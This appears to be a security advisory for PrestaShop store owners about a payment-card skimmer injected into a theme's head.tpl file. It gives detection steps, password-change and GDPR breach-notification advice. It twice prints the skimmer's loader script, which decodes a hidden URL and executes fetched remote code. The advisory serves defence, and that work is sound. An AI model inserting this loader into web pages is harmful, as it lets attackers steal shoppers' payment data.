We have recently identified a security threat affecting certain online stores in the PrestaShop ecosystem. A malicious script (“digital skimmer”) has been detected and may have resulted in the theft of some of your customers' payment information.
What does this digital skimmer do?
This malware works by replacing legitimate payment buttons on the checkout page with fraudulent buttons. When a customer clicks one of these fake buttons, they are redirected to a counterfeit payment form designed to capture their payment information.
The skimmer is simply loaded via a <script> tag, written directly into the _partials/head.tpl file of the store’s active theme. This means the attacker was able to modify a file in the store.
How do I check if my store is affected?
In the front office
You can check your front office code by inspecting a page on your site (right-click, then "inspect").
Look inside the <script> tag. If you find the following code, it means your store is impacted:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Note: The aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz part changes each time, but the code structure remains the same, and the atob() function is always used. There may be code before or after (the skimmer tries to disguise itself by being slightly different on each store).
On your server
If you prefer to check your files, you can find the same script tag in a file on your server.
Connect to your server via FTP then navigate through the theme folder, then the active theme folder > template folder > _partial folder > head.tpl. On this file, right-click then "view/edit", and look for the same tag:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
What should I do if my store is affected?
Change the passwords for your various accesses (back office, database, FTP, SSH, and don’t forget to update the database access in the PrestaShop config file).
If you have any doubts about the security of your store, contact your agency or PrestaShop support.
Do I need to notify my customers?
As data controllers within the meaning of GDPR, it is your responsibility to assess whether a data breach has occurred and, if so, to carry out the required notifications. In accordance with Articles 33 and 34 of the GDPR, any breach likely to result in a risk to rights and freedoms must be reported to the supervisory authority competent within 72 hours, and to the affected individuals in the event of a high risk (Please contact the relevant data protection authority in your country.).
| ⚠️ At this stage, we strongly recommend performing a thorough security check of your PrestaShop stores and ensuring that none of them have been compromised. |